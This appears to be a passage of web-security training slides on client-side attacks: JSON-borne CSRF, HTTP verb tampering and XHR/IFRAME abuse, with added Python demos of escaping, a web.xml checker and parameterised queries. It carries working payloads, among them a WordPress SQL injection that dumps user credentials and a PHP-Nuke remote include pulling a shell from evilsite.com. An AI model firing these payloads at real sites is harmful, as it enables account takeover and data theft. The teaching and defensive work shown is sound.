24. Hacking Client Side Insecurities
JavaScript Jacking – JSON Injections
JSON Injections: The Serialization Insecurity | Web 2.0
Direct injections with encoding. Every JSON value arrives as a string: build the object with a parser such as toJSONObject() instead of evaluating the response, and treat each value as untrusted input.
CSRF: a different way to fuse an attack with object notation. The forged requests sit in the values of an ordinary-looking JSON object; any client that writes those values into the page as markup makes the browser issue them.
{
  "menu": {
    "id": "<img src=\"https://books.example.com/clickbuy?book=ISBNhere&quantity=100\">",
    "value": "<img src=\"https://trading.example.com/xfer?from=MSFT&to=RHAT&confirm=Y\">",
    "popup": "<script src=\"https://www.google.com/accounts/UpdateEmail?service=adsense&Email=mymail@newmail.net&Passwd=cool&save=\"></script>"
  }
}
Cross Site Request Forgery structured in JSON – Google AdSense layout.
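Added example (not code from the slides): the JSON body below is constructed to mirror the menu object on this slide, with the slide's own example URLs. It parses the body with a real JSON parser (every leaf comes back as a str), then renders it two ways: by string concatenation, which emits the attacker's <img> and <script> tags live so the browser fires the forged requests, and with HTML escaping, which neutralises them. The render functions and the forged_requests() check are illustrative helpers, not part of any real client.

```python
import json
import re
from html import escape

# Constructed response body in the shape the slide shows: attacker-controlled
# strings inside an otherwise ordinary JSON "menu" object.  The URLs are the
# slide's examples, not real endpoints.
RESPONSE_BODY = json.dumps({
    "menu": {
        "id": '<img src="https://books.example.com/clickbuy?book=ISBNhere&quantity=100">',
        "value": '<img src="https://trading.example.com/xfer?from=MSFT&to=RHAT&confirm=Y">',
        "popup": '<script src="https://www.google.com/accounts/UpdateEmail'
                 '?service=adsense&Email=mymail@newmail.net&Passwd=cool&save="></script>',
    }
})


def parse_menu(body):
    """Parse with a real JSON parser.  Every leaf is a plain str, never code;
    eval() on the same body would execute anything the attacker appended."""
    menu = json.loads(body)["menu"]
    if not all(isinstance(v, str) for v in menu.values()):
        raise ValueError("unexpected non-string value in menu")
    return menu


def render_unsafe(menu):
    """Vulnerable renderer: values are concatenated straight into markup, so
    an <img>/<script> inside a value becomes a live element and the browser
    sends the request it names (the CSRF in the slide)."""
    return "".join(f"<li class='{k}'>{v}</li>" for k, v in menu.items())


def render_safe(menu):
    """Same layout, but every key and value is HTML-escaped first; the tag
    characters reach the page as &lt; &gt; &quot; text, not elements."""
    return "".join(
        f"<li class='{escape(k, quote=True)}'>{escape(v, quote=True)}</li>"
        for k, v in menu.items()
    )


def forged_requests(html):
    """Crude check for this demo only: the src URLs of live img/script tags
    in the rendered markup, i.e. the requests the browser would issue."""
    return re.findall(r'<(?:img|script)\s+src="([^"]+)"', html)


if __name__ == "__main__":
    menu = parse_menu(RESPONSE_BODY)
    print("unsafe render issues:", forged_requests(render_unsafe(menu)))
    print("safe render issues:  ", forged_requests(render_safe(menu)))
```

The point of the escaped branch is that the JSON parser is not the defence by itself: parsing yields harmless strings, and the damage happens only when a client inserts those strings as HTML without escaping.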
26. Hacking Client Side Insecurities
HTTP Verb Jacking
<security-constraint>
  <web-resource-collection>
    <web-resource-name>drivers</web-resource-name>
    <description>Security constraint for drivers page</description>
    <url-pattern>/drivers.html</url-pattern>
    <http-method>POST</http-method>
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <description>constraint for drivers</description>
    <role-name>manager</role-name>
  </auth-constraint>
</security-constraint>
<login-config>
  <auth-method>BASIC</auth-method>
</login-config>
<security-role>
  <role-name>manager</role-name>
</security-role>
Snapshot of the web.xml file of a target. The security-constraint element defines which requests are restricted; login-config defines the type of authentication allowed.
HTTP Verb Jacking: the manager resource cannot be reached with a GET or POST request without the manager role. What about a HEAD request? Because the constraint lists http-method elements, it applies only to the methods listed; HEAD, and any other method not listed, falls outside the constraint and is served without authentication. Leaving the http-method list out makes the constraint apply to every method.
J2EE, JSP, ASP, ASP.NET, PHP etc. rely on configuration files to decide which request methods to handle [GET/POST/HEAD etc.].
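Added example (not code from the slides): a static check that reads a web.xml and reports, per url-pattern, which HTTP methods no auth-constraint covers. The two web.xml strings are constructed from the slide's snippet; the first keeps its explicit http-method list, the second drops that list so the constraint applies to all methods. The check also honours Servlet 3.0 http-method-omission and the Servlet 3.1 deny-uncovered-http-methods switch. The probe list and the function name are this example's own choices.

```python
import xml.etree.ElementTree as ET

# Methods to check.  A container routes any of them to the same resource, so
# a constraint that names only GET and POST leaves the others unprotected.
PROBE_METHODS = ("GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE")

# Constructed web.xml in the shape of the slide's snippet (explicit method list).
VULNERABLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee">
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>drivers</web-resource-name>
      <url-pattern>/drivers.html</url-pattern>
      <http-method>POST</http-method>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>manager</role-name>
    </auth-constraint>
  </security-constraint>
  <login-config>
    <auth-method>BASIC</auth-method>
  </login-config>
</web-app>
"""

# Same constraint with the http-method list removed: with no list, the
# constraint applies to every HTTP method, so HEAD is covered too.
FIXED_WEB_XML = VULNERABLE_WEB_XML.replace(
    "      <http-method>POST</http-method>\n      <http-method>GET</http-method>\n", "")


def _strip_ns(tag):
    """Drop the XML namespace so lookups work with or without an xmlns."""
    return tag.rsplit("}", 1)[-1]


def uncovered_methods(web_xml, methods=PROBE_METHODS):
    """Return {url-pattern: set of methods no auth-constraint protects}."""
    root = ET.fromstring(web_xml)
    for el in root.iter():
        el.tag = _strip_ns(el.tag)
    # Servlet 3.1: the container itself rejects any method a constraint
    # does not mention, so there is nothing left to report.
    if root.find("deny-uncovered-http-methods") is not None:
        return {}
    protected = {}  # url-pattern -> set of methods that require a role
    for sc in root.findall("security-constraint"):
        if sc.find("auth-constraint") is None:
            continue  # no auth-constraint means no access control at all
        for wrc in sc.findall("web-resource-collection"):
            listed = {m.text.strip().upper() for m in wrc.findall("http-method")}
            omitted = {m.text.strip().upper() for m in wrc.findall("http-method-omission")}
            if listed:
                covered = listed                   # only the named methods
            elif omitted:
                covered = set(methods) - omitted   # everything except the omitted ones
            else:
                covered = set(methods)             # no list: all methods
            for up in wrc.findall("url-pattern"):
                protected.setdefault(up.text.strip(), set()).update(covered)
    gaps = {pat: set(methods) - cov for pat, cov in protected.items()}
    return {pat: gap for pat, gap in gaps.items() if gap}


if __name__ == "__main__":
    print("vulnerable:", uncovered_methods(VULNERABLE_WEB_XML))
    print("fixed:     ", uncovered_methods(FIXED_WEB_XML))
```

Run it against a real deployment descriptor before probing the server by hand; every method it lists for a pattern is one to try with a plain unauthenticated request. Note that it only reads the descriptor: a filter or servlet code that enforces its own checks is outside what it sees.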
29. Hacking Client Side Insecurities
XHR and IFRAME
<script>
var oRequest = new XMLHttpRequest();
var sURL = "http://www.snapdrive.net/files/571814/chrome.txt";
alert('Downloading a txt file..please wait.');
oRequest.open("GET", sURL, false);
// Browsers refuse to let page script override User-Agent; kept as in the original PoC.
oRequest.setRequestHeader("User-Agent", navigator.userAgent);
oRequest.send(null);
var xmlDoc = oRequest.responseText;
alert(xmlDoc);
if (oRequest.status == 200) {
  alert('Done...now try editing the Text-Box!');
  var str = "Winget 3.0 DoS Exploit PoC. Minimize Winget & Right-Click & Copy to clipboard.";
  // Writes a link whose target is an .exe named after the fetched file's contents.
  document.write(str.link("http://" + oRequest.responseText + ".exe"));
} else {
  alert('Error executing XMLHttpRequest call!');
}
</script>
Local DoS [Milw0rm]
var iframe = document.createElement("IFRAME");
iframe.setAttribute("src", 'ftp://localhost/anything');
iframe.setAttribute("name", 'myiframe');
iframe.setAttribute("id", 'myiframe');
// read_iframe() is not shown on the slide.
iframe.setAttribute("onload", 'read_iframe("myiframe")');
iframe.style.width = "100px";
iframe.style.height = "100px";
document.body.appendChild(iframe);
Konqueror 3.5.5 Crash [Milw0rm]
[WordPress SQL Injection through IFRAME]
wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
The newsletter parameter is placed directly in the query, so a UNION with a matching column count returns wp_users rows: login, password hash and e-mail joined by 0x3a (':'), with -- commenting out the rest of the original statement.
[PHP-Nuke IFRAME]
http://www.example.com/nuke_path/iframe.php?file=ftp://user:pass@evilsite.com/public_html/shell.html (or .htm)
http://www.milw0rm.com/exploits/6777
http://www.milw0rm.com/exploits/3512
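Added example (not the plugin's code and not from the slides): a self-contained reproduction of the bug class behind the WordPress newsletter URL above. An in-memory SQLite database with constructed stnl_newsletter and wp_users rows stands in for the site; newsletter_vulnerable() concatenates the parameter into the query the way the URL implies, newsletter_fixed() binds it. The payload is the slide's, with MySQL's concat()/0x3a rewritten as SQLite's || and ':' so it runs here; table layout, row contents and function names are assumptions.

```python
import sqlite3

# The slide's payload, adapted from MySQL concat(a,0x3a,b,...) to SQLite syntax.
PAYLOAD = ("-9999 UNION SELECT user_login || ':' || user_pass || ':' || user_email "
           "FROM wp_users--")


def make_db():
    """Constructed stand-in for the two tables the payload touches."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE stnl_newsletter (id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO stnl_newsletter VALUES (1, 'Welcome to the newsletter');
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT,
                               user_pass TEXT, user_email TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$BconstructedHashValue0',
                                     'admin@example.com');
    """)
    return db


def newsletter_vulnerable(db, newsletter):
    """The bug class: the request parameter is spliced into the SQL text, so
    '-9999 UNION SELECT ...' becomes part of the statement and the UNION
    pulls wp_users columns into the single result column."""
    sql = "SELECT body FROM stnl_newsletter WHERE id = " + newsletter
    return [row[0] for row in db.execute(sql)]


def newsletter_fixed(db, newsletter):
    """Bound parameter: the whole string is compared against id as a value;
    it is never parsed as SQL, so the UNION text simply matches no row."""
    sql = "SELECT body FROM stnl_newsletter WHERE id = ?"
    return [row[0] for row in db.execute(sql, (newsletter,))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id:", newsletter_vulnerable(db, "1"))
    print("vulnerable, payload:  ", newsletter_vulnerable(db, PAYLOAD))
    print("fixed, payload:       ", newsletter_fixed(db, PAYLOAD))
```

The same query works from an IFRAME src as from the address bar; the iframe only makes the request invisible to the victim, it does not change what the server does with the parameter.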